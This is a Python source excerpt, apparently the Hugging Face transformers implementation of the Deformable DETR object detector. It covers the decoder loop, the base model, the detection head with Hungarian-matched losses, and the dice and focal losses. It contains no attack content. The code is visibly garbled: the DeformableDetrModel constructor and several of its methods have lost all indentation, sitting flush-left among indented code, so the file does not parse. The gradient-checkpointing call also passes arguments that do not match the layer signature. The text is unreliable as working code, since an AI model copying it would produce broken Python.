        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        if inputs_embeds is not None:
            hidden_states = inputs_embeds

        # decoder layers
        all_hidden_states = () if output_hidden_states else None
        all_self_attns = () if output_attentions else None
        all_cross_attentions = () if (output_attentions and encoder_hidden_states is not None) else None
        # Outputs of every decoder layer are collected for auxiliary losses / box refinement.
        intermediate = ()
        intermediate_reference_points = ()

        for idx, decoder_layer in enumerate(self.layers):
            # Scale the reference points by the valid ratios of each feature level
            # (boxes use 4 coords, so the ratios are duplicated for width/height).
            if reference_points.shape[-1] == 4:
                reference_points_input = (
                    reference_points[:, :, None] * torch.cat([valid_ratios, valid_ratios], -1)[:, None]
                )
            else:
                if reference_points.shape[-1] != 2:
                    raise ValueError("Reference points' last dimension must be of size 2")
                reference_points_input = reference_points[:, :, None] * valid_ratios[:, None]

            if output_hidden_states:
                all_hidden_states += (hidden_states,)

            if self.gradient_checkpointing and self.training:
                # Recompute activations in the backward pass to save memory.

                def create_custom_forward(module):
                    def custom_forward(*inputs):
                        return module(*inputs, output_attentions)

                    return custom_forward

                layer_outputs = torch.utils.checkpoint.checkpoint(
                    create_custom_forward(decoder_layer),
                    hidden_states,
                    encoder_hidden_states,
                    encoder_attention_mask,
                    None,
                )
            else:
                layer_outputs = decoder_layer(
                    hidden_states,
                    position_embeddings=position_embeddings,
                    encoder_hidden_states=encoder_hidden_states,
                    reference_points=reference_points_input,
                    spatial_shapes=spatial_shapes,
                    level_start_index=level_start_index,
                    encoder_attention_mask=encoder_attention_mask,
                    output_attentions=output_attentions,
                )

            hidden_states = layer_outputs[0]

            # hack implementation for iterative bounding box refinement
            if self.bbox_embed is not None:
                # Predict a box delta from the current hidden states and apply it to the
                # reference points in logit (inverse-sigmoid) space.
                tmp = self.bbox_embed[idx](hidden_states)
                if reference_points.shape[-1] == 4:
                    new_reference_points = tmp + inverse_sigmoid(reference_points)
                    new_reference_points = new_reference_points.sigmoid()
                else:
                    if reference_points.shape[-1] != 2:
                        raise ValueError(
                            f"Reference points' last dimension must be of size 2, but is {reference_points.shape[-1]}"
                        )
                    new_reference_points = tmp
                    new_reference_points[..., :2] = tmp[..., :2] + inverse_sigmoid(reference_points)
                    new_reference_points = new_reference_points.sigmoid()
                # detach: gradients do not flow through the refined reference points
                reference_points = new_reference_points.detach()

            intermediate += (hidden_states,)
            intermediate_reference_points += (reference_points,)

            if output_attentions:
                all_self_attns += (layer_outputs[1],)

                if encoder_hidden_states is not None:
                    all_cross_attentions += (layer_outputs[2],)

        # Keep batch_size as first dimension
        intermediate = torch.stack(intermediate, dim=1)
        intermediate_reference_points = torch.stack(intermediate_reference_points, dim=1)

        # add hidden states from the last decoder layer
        if output_hidden_states:
            all_hidden_states += (hidden_states,)

        if not return_dict:
            return tuple(
                v
                for v in [
                    hidden_states,
                    intermediate,
                    intermediate_reference_points,
                    all_hidden_states,
                    all_self_attns,
                    all_cross_attentions,
                ]
                if v is not None
            )
        return DeformableDetrDecoderOutput(
            last_hidden_state=hidden_states,
            intermediate_hidden_states=intermediate,
            intermediate_reference_points=intermediate_reference_points,
            hidden_states=all_hidden_states,
            attentions=all_self_attns,
            cross_attentions=all_cross_attentions,
        )
@add_start_docstrings(
"""
The bare Deformable DETR Model (consisting of a backbone and encoder-decoder Transformer) outputting raw
hidden-states without any specific head on top.
""",
DEFORMABLE_DETR_START_DOCSTRING,
)
class DeformableDetrModel(DeformableDetrPreTrainedModel):
def __init__(self, config: DeformableDetrConfig):
super().__init__(config)
# Create backbone + positional encoding
backbone = DeformableDetrConvEncoder(config)
position_embeddings = build_position_encoding(config)
self.backbone = DeformableDetrConvModel(backbone, position_embeddings)
# Create input projection layers
if config.num_feature_levels > 1:
num_backbone_outs = len(backbone.intermediate_channel_sizes)
input_proj_list = []
for _ in range(num_backbone_outs):
in_channels = backbone.intermediate_channel_sizes[_]
input_proj_list.append(
nn.Sequential(
nn.Conv2d(in_channels, config.d_model, kernel_size=1),
nn.GroupNorm(32, config.d_model),
)
)
for _ in range(config.num_feature_levels - num_backbone_outs):
input_proj_list.append(
nn.Sequential(
nn.Conv2d(in_channels, config.d_model, kernel_size=3, stride=2, padding=1),
nn.GroupNorm(32, config.d_model),
)
)
in_channels = config.d_model
self.input_proj = nn.ModuleList(input_proj_list)
else:
self.input_proj = nn.ModuleList(
[
nn.Sequential(
nn.Conv2d(backbone.intermediate_channel_sizes[-1], config.d_model, kernel_size=1),
nn.GroupNorm(32, config.d_model),
)
]
)
if not config.two_stage:
self.query_position_embeddings = nn.Embedding(config.num_queries, config.d_model * 2)
self.encoder = DeformableDetrEncoder(config)
self.decoder = DeformableDetrDecoder(config)
self.level_embed = nn.Parameter(torch.Tensor(config.num_feature_levels, config.d_model))
if config.two_stage:
self.enc_output = nn.Linear(config.d_model, config.d_model)
self.enc_output_norm = nn.LayerNorm(config.d_model)
self.pos_trans = nn.Linear(config.d_model * 2, config.d_model * 2)
self.pos_trans_norm = nn.LayerNorm(config.d_model * 2)
else:
self.reference_points = nn.Linear(config.d_model, 2)
self.post_init()
    def get_encoder(self):
        """Return the Deformable DETR encoder."""
        return self.encoder

    def get_decoder(self):
        """Return the Deformable DETR decoder."""
        return self.decoder

    def freeze_backbone(self):
        """Disable gradient computation for all backbone parameters."""
        for name, param in self.backbone.conv_encoder.model.named_parameters():
            param.requires_grad_(False)

    def unfreeze_backbone(self):
        """Re-enable gradient computation for all backbone parameters."""
        for name, param in self.backbone.conv_encoder.model.named_parameters():
            param.requires_grad_(True)
def get_valid_ratio(self, mask):
"""Get the valid ratio of all feature maps."""
_, height, width = mask.shape
valid_height = torch.sum(mask[:, :, 0], 1)
valid_width = torch.sum(mask[:, 0, :], 1)
valid_ratio_heigth = valid_height.float() / height
valid_ratio_width = valid_width.float() / width
valid_ratio = torch.stack([valid_ratio_width, valid_ratio_heigth], -1)
return valid_ratio
def get_proposal_pos_embed(self, proposals):
"""Get the position embedding of the proposals."""
num_pos_feats = 128
temperature = 10000
scale = 2 * math.pi
dim_t = torch.arange(num_pos_feats, dtype=torch.float32, device=proposals.device)
dim_t = temperature ** (2 * torch.div(dim_t, 2) / num_pos_feats)
# batch_size, num_queries, 4
proposals = proposals.sigmoid() * scale
# batch_size, num_queries, 4, 128
pos = proposals[:, :, :, None] / dim_t
# batch_size, num_queries, 4, 64, 2 -> batch_size, num_queries, 512
pos = torch.stack((pos[:, :, :, 0::2].sin(), pos[:, :, :, 1::2].cos()), dim=4).flatten(2)
return pos
def gen_encoder_output_proposals(self, enc_output, padding_mask, spatial_shapes):
"""Generate the encoder output proposals from encoded enc_output.
Args:
enc_output (Tensor[batch_size, sequence_length, hidden_size]): Output of the encoder.
padding_mask (Tensor[batch_size, sequence_length]): Padding mask for `enc_output`.
spatial_shapes (Tensor[num_feature_levels, 2]): Spatial shapes of the feature maps.
Returns:
`tuple(torch.FloatTensor)`: A tuple of feature map and bbox prediction.
- object_query (Tensor[batch_size, sequence_length, hidden_size]): Object query features. Later used to
directly predict a bounding box. (without the need of a decoder)
- output_proposals (Tensor[batch_size, sequence_length, 4]): Normalized proposals, after an inverse
sigmoid.
"""
batch_size = enc_output.shape[0]
proposals = []
_cur = 0
for level, (height, width) in enumerate(spatial_shapes):
mask_flatten_ = padding_mask[:, _cur : (_cur + height * width)].view(batch_size, height, width, 1)
valid_height = torch.sum(~mask_flatten_[:, :, 0, 0], 1)
valid_width = torch.sum(~mask_flatten_[:, 0, :, 0], 1)
grid_y, grid_x = meshgrid(
torch.linspace(0, height - 1, height, dtype=torch.float32, device=enc_output.device),
torch.linspace(0, width - 1, width, dtype=torch.float32, device=enc_output.device),
indexing="ij",
)
grid = torch.cat([grid_x.unsqueeze(-1), grid_y.unsqueeze(-1)], -1)
scale = torch.cat([valid_width.unsqueeze(-1), valid_height.unsqueeze(-1)], 1).view(batch_size, 1, 1, 2)
grid = (grid.unsqueeze(0).expand(batch_size, -1, -1, -1) + 0.5) / scale
width_heigth = torch.ones_like(grid) * 0.05 * (2.0**level)
proposal = torch.cat((grid, width_heigth), -1).view(batch_size, -1, 4)
proposals.append(proposal)
_cur += height * width
output_proposals = torch.cat(proposals, 1)
output_proposals_valid = ((output_proposals > 0.01) & (output_proposals < 0.99)).all(-1, keepdim=True)
output_proposals = torch.log(output_proposals / (1 - output_proposals)) # inverse sigmoid
output_proposals = output_proposals.masked_fill(padding_mask.unsqueeze(-1), float("inf"))
output_proposals = output_proposals.masked_fill(~output_proposals_valid, float("inf"))
# assign each pixel as an object query
object_query = enc_output
object_query = object_query.masked_fill(padding_mask.unsqueeze(-1), float(0))
object_query = object_query.masked_fill(~output_proposals_valid, float(0))
object_query = self.enc_output_norm(self.enc_output(object_query))
return object_query, output_proposals
    @add_start_docstrings_to_model_forward(DEFORMABLE_DETR_INPUTS_DOCSTRING)
    @replace_return_docstrings(output_type=DeformableDetrModelOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        pixel_values,
        pixel_mask=None,
        decoder_attention_mask=None,
        encoder_outputs=None,
        inputs_embeds=None,
        decoder_inputs_embeds=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        r"""
        Returns:
        Examples:
        ```python
        >>> from transformers import AutoImageProcessor, DeformableDetrModel
        >>> from PIL import Image
        >>> import requests
        >>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
        >>> image = Image.open(requests.get(url, stream=True).raw)
        >>> image_processor = AutoImageProcessor.from_pretrained("SenseTime/deformable-detr")
        >>> model = DeformableDetrModel.from_pretrained("SenseTime/deformable-detr")
        >>> inputs = image_processor(images=image, return_tensors="pt")
        >>> outputs = model(**inputs)
        >>> last_hidden_states = outputs.last_hidden_state
        >>> list(last_hidden_states.shape)
        [1, 300, 256]
        ```"""
        # NOTE(review): `decoder_attention_mask`, `inputs_embeds` and `decoder_inputs_embeds` are accepted
        # for API compatibility but are never read anywhere in this body.
        # Fall back to the config defaults for any output flag the caller did not set.
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        batch_size, num_channels, height, width = pixel_values.shape
        device = pixel_values.device
        # With no mask provided, treat every pixel as valid (no padding).
        if pixel_mask is None:
            pixel_mask = torch.ones(((batch_size, height, width)), dtype=torch.long, device=device)
        # Extract multi-scale feature maps of same resolution `config.d_model` (cf Figure 4 in paper)
        # First, sent pixel_values + pixel_mask through Backbone to obtain the features
        # which is a list of tuples
        features, position_embeddings_list = self.backbone(pixel_values, pixel_mask)
        # Then, apply 1x1 convolution to reduce the channel dimension to d_model (256 by default)
        sources = []
        masks = []
        for level, (source, mask) in enumerate(features):
            sources.append(self.input_proj[level](source))
            masks.append(mask)
            if mask is None:
                raise ValueError("No attention mask was provided")
        # Lowest resolution feature maps are obtained via 3x3 stride 2 convolutions on the final stage
        if self.config.num_feature_levels > len(sources):
            _len_sources = len(sources)
            for level in range(_len_sources, self.config.num_feature_levels):
                # The first extra level convolves the backbone's last feature map; any further
                # extra level convolves the previously generated one.
                if level == _len_sources:
                    source = self.input_proj[level](features[-1][0])
                else:
                    source = self.input_proj[level](sources[-1])
                # Downsample the pixel mask to the new feature resolution.
                mask = nn.functional.interpolate(pixel_mask[None].float(), size=source.shape[-2:]).to(torch.bool)[0]
                pos_l = self.backbone.position_embedding(source, mask).to(source.dtype)
                sources.append(source)
                masks.append(mask)
                position_embeddings_list.append(pos_l)
        # Create queries (only the single-stage variant uses learned query embeddings;
        # the two-stage variant derives them from encoder proposals below).
        query_embeds = None
        if not self.config.two_stage:
            query_embeds = self.query_position_embeddings.weight
        # Prepare encoder inputs (by flattening)
        source_flatten = []
        mask_flatten = []
        lvl_pos_embed_flatten = []
        spatial_shapes = []
        for level, (source, mask, pos_embed) in enumerate(zip(sources, masks, position_embeddings_list)):
            batch_size, num_channels, height, width = source.shape
            spatial_shape = (height, width)
            spatial_shapes.append(spatial_shape)
            source = source.flatten(2).transpose(1, 2)
            mask = mask.flatten(1)
            pos_embed = pos_embed.flatten(2).transpose(1, 2)
            # Add a learned per-level embedding so the encoder can tell feature levels apart.
            lvl_pos_embed = pos_embed + self.level_embed[level].view(1, 1, -1)
            lvl_pos_embed_flatten.append(lvl_pos_embed)
            source_flatten.append(source)
            mask_flatten.append(mask)
        source_flatten = torch.cat(source_flatten, 1)
        mask_flatten = torch.cat(mask_flatten, 1)
        lvl_pos_embed_flatten = torch.cat(lvl_pos_embed_flatten, 1)
        spatial_shapes = torch.as_tensor(spatial_shapes, dtype=torch.long, device=source_flatten.device)
        # Start offset of each level inside the flattened (concatenated) sequence.
        level_start_index = torch.cat((spatial_shapes.new_zeros((1,)), spatial_shapes.prod(1).cumsum(0)[:-1]))
        valid_ratios = torch.stack([self.get_valid_ratio(m) for m in masks], 1)
        valid_ratios = valid_ratios.float()
        # Fourth, sent source_flatten + mask_flatten + lvl_pos_embed_flatten (backbone + proj layer output) through encoder
        # Also provide spatial_shapes, level_start_index and valid_ratios
        if encoder_outputs is None:
            encoder_outputs = self.encoder(
                inputs_embeds=source_flatten,
                attention_mask=mask_flatten,
                position_embeddings=lvl_pos_embed_flatten,
                spatial_shapes=spatial_shapes,
                level_start_index=level_start_index,
                valid_ratios=valid_ratios,
                output_attentions=output_attentions,
                output_hidden_states=output_hidden_states,
                return_dict=return_dict,
            )
        # If the user passed a tuple for encoder_outputs, we wrap it in a BaseModelOutput when return_dict=True
        elif return_dict and not isinstance(encoder_outputs, BaseModelOutput):
            encoder_outputs = BaseModelOutput(
                last_hidden_state=encoder_outputs[0],
                hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,
                attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,
            )
        # Fifth, prepare decoder inputs
        batch_size, _, num_channels = encoder_outputs[0].shape
        enc_outputs_class = None
        enc_outputs_coord_logits = None
        if self.config.two_stage:
            # Two-stage variant: turn each encoder output position into a proposal.
            object_query_embedding, output_proposals = self.gen_encoder_output_proposals(
                encoder_outputs[0], ~mask_flatten, spatial_shapes
            )
            # hack implementation for two-stage Deformable DETR
            # apply a detection head to each pixel (A.4 in paper)
            # linear projection for bounding box binary classification (i.e. foreground and background)
            enc_outputs_class = self.decoder.class_embed[-1](object_query_embedding)
            # 3-layer FFN to predict bounding boxes coordinates (bbox regression branch)
            delta_bbox = self.decoder.bbox_embed[-1](object_query_embedding)
            enc_outputs_coord_logits = delta_bbox + output_proposals
            # only keep top scoring `config.two_stage_num_proposals` proposals
            topk = self.config.two_stage_num_proposals
            topk_proposals = torch.topk(enc_outputs_class[..., 0], topk, dim=1)[1]
            topk_coords_logits = torch.gather(
                enc_outputs_coord_logits, 1, topk_proposals.unsqueeze(-1).repeat(1, 1, 4)
            )
            # Detach so the selected proposal coordinates act as fixed reference points downstream.
            topk_coords_logits = topk_coords_logits.detach()
            reference_points = topk_coords_logits.sigmoid()
            init_reference_points = reference_points
            pos_trans_out = self.pos_trans_norm(self.pos_trans(self.get_proposal_pos_embed(topk_coords_logits)))
            query_embed, target = torch.split(pos_trans_out, num_channels, dim=2)
        else:
            # Single-stage variant: split the learned embeddings into positional and content halves.
            query_embed, target = torch.split(query_embeds, num_channels, dim=1)
            query_embed = query_embed.unsqueeze(0).expand(batch_size, -1, -1)
            target = target.unsqueeze(0).expand(batch_size, -1, -1)
            reference_points = self.reference_points(query_embed).sigmoid()
            init_reference_points = reference_points
        decoder_outputs = self.decoder(
            inputs_embeds=target,
            position_embeddings=query_embed,
            encoder_hidden_states=encoder_outputs[0],
            encoder_attention_mask=mask_flatten,
            reference_points=reference_points,
            spatial_shapes=spatial_shapes,
            level_start_index=level_start_index,
            valid_ratios=valid_ratios,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        if not return_dict:
            # Two-stage outputs are appended only when they exist, to keep tuple positions stable.
            enc_outputs = tuple(value for value in [enc_outputs_class, enc_outputs_coord_logits] if value is not None)
            tuple_outputs = (init_reference_points,) + decoder_outputs + encoder_outputs + enc_outputs
            return tuple_outputs
        return DeformableDetrModelOutput(
            init_reference_points=init_reference_points,
            last_hidden_state=decoder_outputs.last_hidden_state,
            intermediate_hidden_states=decoder_outputs.intermediate_hidden_states,
            intermediate_reference_points=decoder_outputs.intermediate_reference_points,
            decoder_hidden_states=decoder_outputs.hidden_states,
            decoder_attentions=decoder_outputs.attentions,
            cross_attentions=decoder_outputs.cross_attentions,
            encoder_last_hidden_state=encoder_outputs.last_hidden_state,
            encoder_hidden_states=encoder_outputs.hidden_states,
            encoder_attentions=encoder_outputs.attentions,
            enc_outputs_class=enc_outputs_class,
            enc_outputs_coord_logits=enc_outputs_coord_logits,
        )
@add_start_docstrings(
    """
    Deformable DETR Model (consisting of a backbone and encoder-decoder Transformer) with object detection heads on
    top, for tasks such as COCO detection.
    """,
    DEFORMABLE_DETR_START_DOCSTRING,
)
class DeformableDetrForObjectDetection(DeformableDetrPreTrainedModel):
    # When using clones, all layers > 0 will be clones, but layer 0 *is* required
    # Raw strings so `\.` and `\d` are regex escapes, not (invalid) Python string escapes.
    _keys_to_ignore_on_load_missing = [r"bbox_embed\.[1-9]\d*", r"class_embed\.[1-9]\d*"]
    def __init__(self, config: DeformableDetrConfig):
        super().__init__(config)
        # Deformable DETR encoder-decoder model
        self.model = DeformableDetrModel(config)
        # Detection heads on top: a linear classifier and a 3-layer MLP bbox regressor.
        self.class_embed = nn.Linear(config.d_model, config.num_labels)
        self.bbox_embed = DeformableDetrMLPPredictionHead(
            input_dim=config.d_model, hidden_dim=config.d_model, output_dim=4, num_layers=3
        )
        # Bias the classifier toward "background" at init (focal-loss prior trick).
        prior_prob = 0.01
        bias_value = -math.log((1 - prior_prob) / prior_prob)
        self.class_embed.bias.data = torch.ones(config.num_labels) * bias_value
        nn.init.constant_(self.bbox_embed.layers[-1].weight.data, 0)
        nn.init.constant_(self.bbox_embed.layers[-1].bias.data, 0)
        # if two-stage, the last class_embed and bbox_embed is for region proposal generation
        num_pred = (config.decoder_layers + 1) if config.two_stage else config.decoder_layers
        if config.with_box_refine:
            self.class_embed = _get_clones(self.class_embed, num_pred)
            self.bbox_embed = _get_clones(self.bbox_embed, num_pred)
            nn.init.constant_(self.bbox_embed[0].layers[-1].bias.data[2:], -2.0)
            # hack implementation for iterative bounding box refinement
            self.model.decoder.bbox_embed = self.bbox_embed
        else:
            nn.init.constant_(self.bbox_embed.layers[-1].bias.data[2:], -2.0)
            # Without box refinement every decoder layer shares the very same head modules.
            self.class_embed = nn.ModuleList([self.class_embed for _ in range(num_pred)])
            self.bbox_embed = nn.ModuleList([self.bbox_embed for _ in range(num_pred)])
            self.model.decoder.bbox_embed = None
        if config.two_stage:
            # hack implementation for two-stage
            self.model.decoder.class_embed = self.class_embed
            for box_embed in self.bbox_embed:
                nn.init.constant_(box_embed.layers[-1].bias.data[2:], 0.0)
        # Initialize weights and apply final processing
        self.post_init()
    # taken from https://github.com/facebookresearch/detr/blob/master/models/detr.py
    @torch.jit.unused
    def _set_aux_loss(self, outputs_class, outputs_coord):
        # this is a workaround to make torchscript happy, as torchscript
        # doesn't support dictionary with non-homogeneous values, such
        # as a dict having both a Tensor and a list.
        return [{"logits": a, "pred_boxes": b} for a, b in zip(outputs_class[:-1], outputs_coord[:-1])]
    @add_start_docstrings_to_model_forward(DEFORMABLE_DETR_INPUTS_DOCSTRING)
    @replace_return_docstrings(output_type=DeformableDetrObjectDetectionOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        pixel_values,
        pixel_mask=None,
        decoder_attention_mask=None,
        encoder_outputs=None,
        inputs_embeds=None,
        decoder_inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        r"""
        labels (`List[Dict]` of len `(batch_size,)`, *optional*):
            Labels for computing the bipartite matching loss. List of dicts, each dictionary containing at least the
            following 2 keys: 'class_labels' and 'boxes' (the class labels and bounding boxes of an image in the batch
            respectively). The class labels themselves should be a `torch.LongTensor` of len `(number of bounding boxes
            in the image,)` and the boxes a `torch.FloatTensor` of shape `(number of bounding boxes in the image, 4)`.
        Returns:
        Examples:
        ```python
        >>> from transformers import AutoImageProcessor, DeformableDetrForObjectDetection
        >>> from PIL import Image
        >>> import requests
        >>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
        >>> image = Image.open(requests.get(url, stream=True).raw)
        >>> image_processor = AutoImageProcessor.from_pretrained("SenseTime/deformable-detr")
        >>> model = DeformableDetrForObjectDetection.from_pretrained("SenseTime/deformable-detr")
        >>> inputs = image_processor(images=image, return_tensors="pt")
        >>> outputs = model(**inputs)
        >>> # convert outputs (bounding boxes and class logits) to COCO API
        >>> target_sizes = torch.tensor([image.size[::-1]])
        >>> results = image_processor.post_process_object_detection(outputs, threshold=0.5, target_sizes=target_sizes)[
        ...     0
        ... ]
        >>> for score, label, box in zip(results["scores"], results["labels"], results["boxes"]):
        ...     box = [round(i, 2) for i in box.tolist()]
        ...     print(
        ...         f"Detected {model.config.id2label[label.item()]} with confidence "
        ...         f"{round(score.item(), 3)} at location {box}"
        ...     )
        Detected cat with confidence 0.8 at location [16.5, 52.84, 318.25, 470.78]
        Detected cat with confidence 0.789 at location [342.19, 24.3, 640.02, 372.25]
        Detected remote with confidence 0.633 at location [40.79, 72.78, 176.76, 117.25]
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        # First, sent images through DETR base model to obtain encoder + decoder outputs
        outputs = self.model(
            pixel_values,
            pixel_mask=pixel_mask,
            decoder_attention_mask=decoder_attention_mask,
            encoder_outputs=encoder_outputs,
            inputs_embeds=inputs_embeds,
            decoder_inputs_embeds=decoder_inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        hidden_states = outputs.intermediate_hidden_states if return_dict else outputs[2]
        init_reference = outputs.init_reference_points if return_dict else outputs[0]
        inter_references = outputs.intermediate_reference_points if return_dict else outputs[3]
        # class logits + predicted bounding boxes, one prediction per decoder layer
        outputs_classes = []
        outputs_coords = []
        for level in range(hidden_states.shape[1]):
            if level == 0:
                reference = init_reference
            else:
                reference = inter_references[:, level - 1]
            reference = inverse_sigmoid(reference)
            outputs_class = self.class_embed[level](hidden_states[:, level])
            delta_bbox = self.bbox_embed[level](hidden_states[:, level])
            if reference.shape[-1] == 4:
                outputs_coord_logits = delta_bbox + reference
            elif reference.shape[-1] == 2:
                # 2-dim references only carry a center point; width/height come purely from the head.
                delta_bbox[..., :2] += reference
                outputs_coord_logits = delta_bbox
            else:
                raise ValueError(f"reference.shape[-1] should be 4 or 2, but got {reference.shape[-1]}")
            outputs_coord = outputs_coord_logits.sigmoid()
            outputs_classes.append(outputs_class)
            outputs_coords.append(outputs_coord)
        # Keep batch_size as first dimension
        outputs_class = torch.stack(outputs_classes, dim=1)
        outputs_coord = torch.stack(outputs_coords, dim=1)
        # The last decoder layer provides the final predictions.
        logits = outputs_class[:, -1]
        pred_boxes = outputs_coord[:, -1]
        loss, loss_dict, auxiliary_outputs = None, None, None
        if labels is not None:
            # First: create the matcher
            matcher = DeformableDetrHungarianMatcher(
                class_cost=self.config.class_cost, bbox_cost=self.config.bbox_cost, giou_cost=self.config.giou_cost
            )
            # Second: create the criterion
            losses = ["labels", "boxes", "cardinality"]
            criterion = DeformableDetrLoss(
                matcher=matcher,
                num_classes=self.config.num_labels,
                focal_alpha=self.config.focal_alpha,
                losses=losses,
            )
            criterion.to(self.device)
            # Third: compute the losses, based on outputs and labels
            outputs_loss = {}
            outputs_loss["logits"] = logits
            outputs_loss["pred_boxes"] = pred_boxes
            if self.config.auxiliary_loss:
                auxiliary_outputs = self._set_aux_loss(outputs_class, outputs_coord)
                outputs_loss["auxiliary_outputs"] = auxiliary_outputs
            if self.config.two_stage:
                # Fix: the first-stage (encoder proposal) predictions must be fed to the criterion
                # through `outputs_loss` (not the model output object) and under the "logits" key
                # that `DeformableDetrLoss.loss_labels` reads.
                enc_outputs_coord = outputs.enc_outputs_coord_logits.sigmoid()
                outputs_loss["enc_outputs"] = {"logits": outputs.enc_outputs_class, "pred_boxes": enc_outputs_coord}
            loss_dict = criterion(outputs_loss, labels)
            # Fourth: compute total loss, as a weighted sum of the various losses
            weight_dict = {"loss_ce": 1, "loss_bbox": self.config.bbox_loss_coefficient}
            weight_dict["loss_giou"] = self.config.giou_loss_coefficient
            if self.config.auxiliary_loss:
                aux_weight_dict = {}
                for i in range(self.config.decoder_layers - 1):
                    aux_weight_dict.update({k + f"_{i}": v for k, v in weight_dict.items()})
                weight_dict.update(aux_weight_dict)
            # Losses without an entry in weight_dict (e.g. cardinality_error) are logging-only.
            loss = sum(loss_dict[k] * weight_dict[k] for k in loss_dict.keys() if k in weight_dict)
        if not return_dict:
            if auxiliary_outputs is not None:
                output = (logits, pred_boxes) + auxiliary_outputs + outputs
            else:
                output = (logits, pred_boxes) + outputs
            tuple_outputs = ((loss, loss_dict) + output) if loss is not None else output
            return tuple_outputs
        dict_outputs = DeformableDetrObjectDetectionOutput(
            loss=loss,
            loss_dict=loss_dict,
            logits=logits,
            pred_boxes=pred_boxes,
            auxiliary_outputs=auxiliary_outputs,
            last_hidden_state=outputs.last_hidden_state,
            decoder_hidden_states=outputs.decoder_hidden_states,
            decoder_attentions=outputs.decoder_attentions,
            cross_attentions=outputs.cross_attentions,
            encoder_last_hidden_state=outputs.encoder_last_hidden_state,
            encoder_hidden_states=outputs.encoder_hidden_states,
            encoder_attentions=outputs.encoder_attentions,
            intermediate_hidden_states=outputs.intermediate_hidden_states,
            intermediate_reference_points=outputs.intermediate_reference_points,
            init_reference_points=outputs.init_reference_points,
            enc_outputs_class=outputs.enc_outputs_class,
            enc_outputs_coord_logits=outputs.enc_outputs_coord_logits,
        )
        return dict_outputs
# Copied from transformers.models.detr.modeling_detr.dice_loss
def dice_loss(inputs, targets, num_boxes):
    """
    Compute the DICE loss, similar to generalized IOU for masks

    Args:
        inputs: A float tensor of arbitrary shape.
            The predictions for each example.
        targets: A float tensor with the same shape as inputs. Stores the binary
            classification label for each element in inputs (0 for the negative class and 1 for the positive
            class).
    """
    # Turn the logits into probabilities and collapse everything but the batch dimension.
    probs = inputs.sigmoid().flatten(1)
    intersection = 2 * (probs * targets).sum(1)
    totals = probs.sum(-1) + targets.sum(-1)
    # +1 in numerator/denominator smooths the ratio for empty masks.
    per_sample_loss = 1 - (intersection + 1) / (totals + 1)
    return per_sample_loss.sum() / num_boxes
# Copied from transformers.models.detr.modeling_detr.sigmoid_focal_loss
def sigmoid_focal_loss(inputs, targets, num_boxes, alpha: float = 0.25, gamma: float = 2):
    """
    Loss used in RetinaNet for dense detection: https://arxiv.org/abs/1708.02002.

    Args:
        inputs (`torch.FloatTensor` of arbitrary shape):
            The predictions for each example.
        targets (`torch.FloatTensor` with the same shape as `inputs`)
            A tensor storing the binary classification label for each element in the `inputs` (0 for the negative class
            and 1 for the positive class).
        alpha (`float`, *optional*, defaults to `0.25`):
            Optional weighting factor in the range (0,1) to balance positive vs. negative examples.
        gamma (`int`, *optional*, defaults to `2`):
            Exponent of the modulating factor (1 - p_t) to balance easy vs hard examples.

    Returns:
        Loss tensor
    """
    probs = inputs.sigmoid()
    bce = nn.functional.binary_cross_entropy_with_logits(inputs, targets, reduction="none")
    # p_t is the probability assigned to the true class; the modulating factor
    # (1 - p_t) ** gamma down-weights well-classified examples.
    p_t = probs * targets + (1 - probs) * (1 - targets)
    focal = bce * ((1 - p_t) ** gamma)
    if alpha >= 0:
        # Class-balancing weight: alpha for positives, (1 - alpha) for negatives.
        alpha_t = alpha * targets + (1 - alpha) * (1 - targets)
        focal = alpha_t * focal
    return focal.mean(1).sum() / num_boxes
class DeformableDetrLoss(nn.Module):
    """
    This class computes the losses for `DeformableDetrForObjectDetection`. The process happens in two steps: 1) we
    compute hungarian assignment between ground truth boxes and the outputs of the model 2) we supervise each pair of
    matched ground-truth / prediction (supervise class and box).

    Args:
        matcher (`DeformableDetrHungarianMatcher`):
            Module able to compute a matching between targets and proposals.
        num_classes (`int`):
            Number of object categories, omitting the special no-object category.
        focal_alpha (`float`):
            Alpha parameter in focal loss.
        losses (`List[str]`):
            List of all the losses to be applied. See `get_loss` for a list of all available losses.
    """

    def __init__(self, matcher, num_classes, focal_alpha, losses):
        super().__init__()
        self.matcher = matcher
        self.num_classes = num_classes
        self.focal_alpha = focal_alpha
        self.losses = losses

    # removed logging parameter, which was part of the original implementation
    def loss_labels(self, outputs, targets, indices, num_boxes):
        """
        Classification loss (Binary focal loss) targets dicts must contain the key "class_labels" containing a tensor
        of dim [nb_target_boxes]
        """
        if "logits" not in outputs:
            raise KeyError("No logits were found in the outputs")
        source_logits = outputs["logits"]
        idx = self._get_source_permutation_idx(indices)
        target_classes_o = torch.cat([t["class_labels"][J] for t, (_, J) in zip(targets, indices)])
        # Unmatched queries are assigned the "no object" class (index num_classes).
        target_classes = torch.full(
            source_logits.shape[:2], self.num_classes, dtype=torch.int64, device=source_logits.device
        )
        target_classes[idx] = target_classes_o
        # One-hot encode with an extra "no object" slot, which is dropped right after.
        target_classes_onehot = torch.zeros(
            [source_logits.shape[0], source_logits.shape[1], source_logits.shape[2] + 1],
            dtype=source_logits.dtype,
            layout=source_logits.layout,
            device=source_logits.device,
        )
        target_classes_onehot.scatter_(2, target_classes.unsqueeze(-1), 1)
        target_classes_onehot = target_classes_onehot[:, :, :-1]
        loss_ce = (
            sigmoid_focal_loss(source_logits, target_classes_onehot, num_boxes, alpha=self.focal_alpha, gamma=2)
            * source_logits.shape[1]
        )
        losses = {"loss_ce": loss_ce}
        return losses

